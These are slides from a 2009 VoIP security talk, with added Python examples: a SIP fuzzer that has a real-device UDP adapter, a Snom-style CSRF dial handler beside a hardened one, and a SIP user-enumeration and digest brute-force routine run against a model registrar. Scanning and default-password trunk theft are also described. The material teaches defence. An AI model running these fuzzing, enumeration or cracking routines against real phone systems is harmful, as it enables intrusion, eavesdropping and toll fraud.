11. VoIP: A hacker's dream
• Integrates the voice communications of an
organisation into an environment the attacker
is familiar with
• Same protocols, tools and environments
• Open standards and accessible devices
• Scary as hell when you think about it – you
just moved your entire comms infrastructure
to our playground
• Cheers!
VoIP Security ‐ Implementation and Protocol Problems, 5th May 2009
13. Good ol' memory corruption
Servers running on Windows, Linux or other
Unix
+ Phones running on a traditional OS or often
embedded Linux
+ Written in C/C++
= Buffer overflows, NULL pointers, infinite loops
and all their friends
14. Finding the bugs
• Fuzzing ‐ a rather effective hammer for many a
nail
• Automatically generating and sending semi‐valid
requests to a target in the hope of crashing it
• Requires no understanding of the application/
device internals
• Responsible for the detection of a huge
percentage of security bugs
18. Building your own fuzzer
• Generational fuzzing frameworks available –
Peach, Sulley, Fusil, Spike etc
• Map out the protocol in a high level
description language
• Auxiliary tools for crash detection and logging
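The three ingredients of slides 14 and 18 (a protocol map, a mutation engine that produces semi‐valid requests, and crash detection) in one small generational SIP fuzzer. This is an added example, not code from the talk or from any of the frameworks named above; the INVITE template, the addresses in it, and the toy target `toy_parse_sip` (which stands in for a phone or server with a fixed‐size header buffer and an unchecked Content‐Length) are constructed for the example. `udp_target` shows how the same loop would be pointed at a real device, using silence as the crash signal.

```python
import socket

# Protocol map: the fields of a SIP INVITE with one valid default each.
# Addresses, tags and Call-ID are constructed for the example.
INVITE_TEMPLATE = [
    ("method", "INVITE"),
    ("uri", "sip:1000@192.0.2.10"),
    ("via", "SIP/2.0/UDP 192.0.2.20:5060;branch=z9hG4bK776asdhds"),
    ("from", "<sip:fuzz@192.0.2.20>;tag=1928301774"),
    ("to", "<sip:1000@192.0.2.10>"),
    ("call_id", "a84b4c76e66710@192.0.2.20"),
    ("cseq", "314159 INVITE"),
    ("content_length", "0"),
]

def build_invite(fields):
    """Render the field list into a wire-format SIP request."""
    f = dict(fields)
    return (f"{f['method']} {f['uri']} SIP/2.0\r\n"
            f"Via: {f['via']}\r\nFrom: {f['from']}\r\nTo: {f['to']}\r\n"
            f"Call-ID: {f['call_id']}\r\nCSeq: {f['cseq']}\r\n"
            f"Content-Length: {f['content_length']}\r\n\r\n")

# Mutation strategies: what the fuzzer substitutes into a single field.
STRING_MUTATIONS = {"long_256": "A" * 256, "long_4096": "A" * 4096,
                    "format": "%s%s%n%n", "empty": "", "crlf_inject": "x\r\nEvil: y"}
INT_MUTATIONS = {"neg": "-1", "huge": "4294967295",
                 "overflow": "99999999999999999999", "nan": "abc"}

def generate_cases(template=INVITE_TEMPLATE):
    """Yield (case_name, request): one field mutated at a time, the rest valid,
    so every request is semi-valid and reaches deep into the target's parser."""
    for i, (name, _default) in enumerate(template):
        muts = INT_MUTATIONS if name == "content_length" else STRING_MUTATIONS
        for mname, mval in muts.items():
            fields = list(template)
            fields[i] = (name, mval)
            yield f"{name}:{mname}", build_invite(fields)

def fuzz(target, template=INVITE_TEMPLATE):
    """Feed every case to `target` (a callable) and log the cases that crash it."""
    crashes = []
    for case, req in generate_cases(template):
        try:
            target(req)
        except Exception as exc:            # crash detection: any unhandled error
            crashes.append((case, type(exc).__name__))
    return crashes

def udp_target(host, port=5060, timeout=2.0):
    """Adapter for a real device (not exercised here): send over UDP and treat
    silence as a crash candidate, the crudest form of liveness monitoring."""
    def send(req):
        with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
            s.settimeout(timeout)
            s.sendto(req.encode(), (host, port))
            s.recvfrom(65535)               # raises socket.timeout if the stack died
    return send

CSEQ_BUF = 32   # constructed: stands in for a fixed-size header buffer in C

def toy_parse_sip(raw):
    """Constructed toy target with the kind of defects slide 13 lists: a
    fixed-size CSeq buffer and a Content-Length trusted without validation."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, uri, version = lines[0].split(" ", 2)        # fails on a broken request line
    headers = dict(line.split(": ", 1) for line in lines[1:])
    if len(headers["CSeq"]) > CSEQ_BUF:
        raise MemoryError("CSeq overflowed fixed buffer")   # the 'buffer overflow'
    length = int(headers["Content-Length"])                 # ValueError on 'abc'
    if length < 0:
        raise IndexError("negative Content-Length used as body size")
    return method, headers["Call-ID"], body[:length]

if __name__ == "__main__":
    for case, err in fuzz(toy_parse_sip):
        print(f"crash: {case:24} {err}")
```

Against the toy target the run reports six crashes, all from the CSeq, Content‐Length and request‐line mutations, and none from the long Via/From/To values. That is the information a generational fuzzer gives you: which field and which mutation, so the crash can be reproduced and triaged.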
24. Web service attacks
• Most hard‐phones provide a web based admin
interface, as do many servers
• Notoriously security agnostic
• XSS, CSRF, SQL injection, default/no passwords,
authentication bypass
"Cisco Unified Communications Manager is vulnerable to
a SQL Injection attack in the parameter key of the
admin and user interface pages. A successful attack
could allow an authenticated attacker to access
information such as usernames and password hashes
that are stored in the database." – Cisco 2008
26. GNUCitizen.org – Snom 320 attack
• Attacker scans for vulnerable devices by
checking for remotely accessible signature
files
• Attacker sends a POST to the victim's IP with data:
NUMBER=ATTACKERNUM
• Attacker answers the incoming call
• Vulnerable device uses its built‐in microphone to
capture ambient sound and send it to the
attacker
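The Snom attack on this slide works because the phone's web interface (slide 24) accepts a state‐changing POST from anyone, with no login and no CSRF protection. The following added example, not code from the talk or from GNUCitizen, models a dial endpoint in that style beside a hardened version that demands a session, a same‐origin request and a per‐session CSRF token. The `Phone` and `Request` classes, the origin `http://192.0.2.50`, the admin password and the form field names other than `NUMBER` are constructed for the example.

```python
import hmac
import hashlib
import secrets
from dataclasses import dataclass, field

PHONE_ORIGIN = "http://192.0.2.50"   # constructed: the phone's own web origin

@dataclass
class Phone:
    """Constructed stand-in for a hard-phone's web admin state."""
    admin_password: str
    calls: list = field(default_factory=list)      # numbers the phone has dialled
    sessions: dict = field(default_factory=dict)   # session id -> CSRF secret

@dataclass
class Request:
    method: str
    form: dict
    headers: dict = field(default_factory=dict)
    cookies: dict = field(default_factory=dict)

def vulnerable_dial(phone, req):
    """Snom-320-style handler: any POST carrying NUMBER makes the phone dial.
    No login, no CSRF token, no origin check."""
    if req.method == "POST" and "NUMBER" in req.form:
        phone.calls.append(req.form["NUMBER"])
        return 200
    return 400

def login(phone, password):
    """Hardened side: issue a session id and a per-session CSRF secret."""
    if not hmac.compare_digest(password.encode(), phone.admin_password.encode()):
        return None
    sid = secrets.token_hex(16)
    phone.sessions[sid] = secrets.token_bytes(32)
    return sid

def csrf_token(phone, sid):
    """Token bound to the session secret; the admin's own page embeds it in the form."""
    return hmac.new(phone.sessions[sid], b"dial-form", hashlib.sha256).hexdigest()

def hardened_dial(phone, req):
    """Requires a logged-in session, a same-origin request and a valid CSRF token."""
    if req.method != "POST":
        return 405
    sid = req.cookies.get("session")
    if sid not in phone.sessions:
        return 401                                   # attacker's bare POST stops here
    origin = req.headers.get("Origin")
    if origin is not None and origin != PHONE_ORIGIN:
        return 403                                   # cross-site form post stops here
    if not hmac.compare_digest(req.form.get("csrf", ""), csrf_token(phone, sid)):
        return 403                                   # forged request without token stops here
    if "NUMBER" not in req.form:
        return 400
    phone.calls.append(req.form["NUMBER"])
    return 200

def demo():
    """Replay the slide's POST against both handlers; return the status codes."""
    phone = Phone(admin_password="hunter2")
    attacker_post = Request("POST", {"NUMBER": "ATTACKERNUM"})
    sid = login(phone, "hunter2")
    # CSRF variant: the admin's browser is tricked into submitting the attacker's
    # form, so the session cookie rides along but the Origin is the attacker's site.
    csrf_post = Request("POST", {"NUMBER": "ATTACKERNUM"},
                        headers={"Origin": "http://attacker.example"},
                        cookies={"session": sid})
    legit = Request("POST", {"NUMBER": "1001", "csrf": csrf_token(phone, sid)},
                    headers={"Origin": PHONE_ORIGIN}, cookies={"session": sid})
    results = {
        "vulnerable_direct": vulnerable_dial(phone, attacker_post),
        "hardened_direct": hardened_dial(phone, attacker_post),
        "hardened_csrf": hardened_dial(phone, csrf_post),
        "hardened_legit": hardened_dial(phone, legit),
    }
    return results, list(phone.calls)

if __name__ == "__main__":
    print(demo())
```

The vulnerable handler dials ATTACKERNUM for the unauthenticated POST; the hardened one rejects it with 401, rejects the cross‐site replay with 403, and only dials for the admin's own form submission. The token check is the real defence; the Origin check is defence in depth for browsers that send the header.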
30. Attacking the protocols ‐ discovery
• Most VoIP protocols listen on well‐known ports
over TCP or UDP (SIP on 5060, H.323 on 1720,
SCCP on 2000) – nmap
• Specialist tools available for certain protocols
– SIPVicious, iaxscan – Can scan thousands of
hosts an hour
• Scanning random hosts turns up hordes of
easily accessible servers
31. Attacking the protocols ‐
authentication
• SIP and IAX2 – two‐step authentication by default
• What does that mean? – We can enumerate valid
accounts first and then crack passwords
• Account discovery search space
– Two step auth = X + X (enumerate the users, then
crack each valid account's password)
– Single step auth = X * X (every username/password
pair has to be tried)
Where X is the size of the username/password pool
• We'd shoot a web developer who did this but
apparently it's OK for VoIP
32. Attacking the protocols ‐
authentication
• Many networks still use 3 or 4 digit usernames
and passwords
• SIPVicious/iaxscan can check all possible
combinations in minutes
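Slides 31 and 32 worked through in code, as an added example that is not part of the talk and not SIPVicious or iaxscan. A constructed registrar model answers REGISTER the way a leaky SIP server does (an unknown user is refused outright, a known user is challenged with 401, so the first reply alone reveals whether the account exists) or the way a uniform one does (everyone is challenged, every failure looks the same). The digest computation is the RFC 2617 response without qop as SIP uses it; the realm, nonce, extension pool, PIN pool and the two valid accounts are constructed, and kept at 3‐digit extensions with 100 candidate PINs so the full X * X run completes instantly.

```python
import hashlib

REALM, NONCE = "asterisk", "5e6d3f1a2b9c"   # constructed challenge parameters

def digest_response(user, password, method="REGISTER", uri="sip:192.0.2.10",
                    realm=REALM, nonce=NONCE):
    """SIP digest response without qop (RFC 2617): MD5(MD5(A1):nonce:MD5(A2))."""
    ha1 = hashlib.md5(f"{user}:{realm}:{password}".encode()).hexdigest()
    ha2 = hashlib.md5(f"{method}:{uri}".encode()).hexdigest()
    return hashlib.md5(f"{ha1}:{nonce}:{ha2}".encode()).hexdigest()

class Registrar:
    """Constructed model of a registrar's REGISTER handling.
    leaky=True : unknown users get 403 at once, known users get a 401 challenge.
    leaky=False: every user is challenged and every failure is a 403."""
    def __init__(self, accounts, leaky):
        self.accounts, self.leaky, self.requests = accounts, leaky, 0

    def register(self, user, response=None):
        self.requests += 1                         # cost counter for the comparison
        known = user in self.accounts
        if response is None:                       # first, unauthenticated REGISTER
            return 401 if known or not self.leaky else 403
        if known and response == digest_response(user, self.accounts[user]):
            return 200
        return 403

def enumerate_users(reg, candidates):
    """Step 1 of the two-step attack: keep every user the registrar challenges."""
    return [u for u in candidates if reg.register(u) == 401]

def crack(reg, user, passwords):
    """Step 2: answer the challenge with each candidate password in turn."""
    for pw in passwords:
        if reg.register(user, digest_response(user, pw)) == 200:
            return pw
    return None

def two_step_attack(reg, users, passwords):
    found = {}
    for u in enumerate_users(reg, users):
        pw = crack(reg, u, passwords)
        if pw is not None:
            found[u] = pw
    return found

def single_step_attack(reg, users, passwords):
    """Without the leak every (user, password) pair must be tried: X * X requests."""
    found = {}
    for u in users:
        pw = crack(reg, u, passwords)
        if pw is not None:
            found[u] = pw
    return found

# Constructed pools: 3-digit extensions and 4-digit PINs (100 of each, X = 100).
USERS = [str(n) for n in range(100, 200)]
PASSWORDS = [str(n) for n in range(1000, 1100)]
ACCOUNTS = {"101": "1011", "150": "1077"}          # constructed valid accounts

def compare():
    """Accounts found and requests spent for each attack/registrar combination."""
    out = {}
    for name, leaky, attack in (("leaky_two_step", True, two_step_attack),
                                ("uniform_two_step", False, two_step_attack),
                                ("leaky_single_step", True, single_step_attack)):
        reg = Registrar(ACCOUNTS, leaky)
        found = attack(reg, USERS, PASSWORDS)
        out[name] = (found, reg.requests)
    return out

if __name__ == "__main__":
    for name, (found, cost) in compare().items():
        print(f"{name:20} found={found} requests={cost}")
```

Against the leaky registrar the two‐step attack recovers both accounts in 190 requests (100 to enumerate, then only the two real accounts are cracked); against the uniform registrar the enumeration step returns every candidate and the cost climbs to 9,990, the same order as the 9,890 of brute‐forcing every pair. Uniform responses (Asterisk's alwaysauthreject, for instance) are what turn X + X back into X * X; with 4‐digit pools that is the difference between seconds and a hundred million requests.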
34. Taking the trunk
• Stealing individual accounts is fun and all but
how about stealing the phone company?
• Requires admin access to an accessible router
or switch
• How?
• Straight through the front door
35. Taking the trunk
• Robert Moore – 2007, stole 10 million minutes
worth of talk time
• Step 1: Bought information on corporate IP
addresses for $800
• Step 2: Scanned for accessible VoIP routers and
switches
• Step 3: Scanned for default passwords and
unpatched Cisco boxes
• Step 4: Profit! (Or jail in Mr. Moore's case)
36. Taking the trunk
• "70% of all the companies he scanned were
insecure, and 45% to 50% of VoIP providers were
insecure"
• "I'd say 85% of them were misconfigured routers.
They had the default passwords on them."
• "The telecoms we couldn't get into had access
lists or boxes we couldn't get into because of
strong passwords."
‐ Source: http://www.informationweek.com
37. Attacking the protocols ‐ summary
• Essentially the same offence/defence we've
had for years
• Discovery, enumeration and exploitation
follow roughly the same patterns as most
other TCP/IP services
• Protecting against these problems is the same
struggle with password management, access
lists and updates
38. Question Time!
http://seanhn.wordpress.com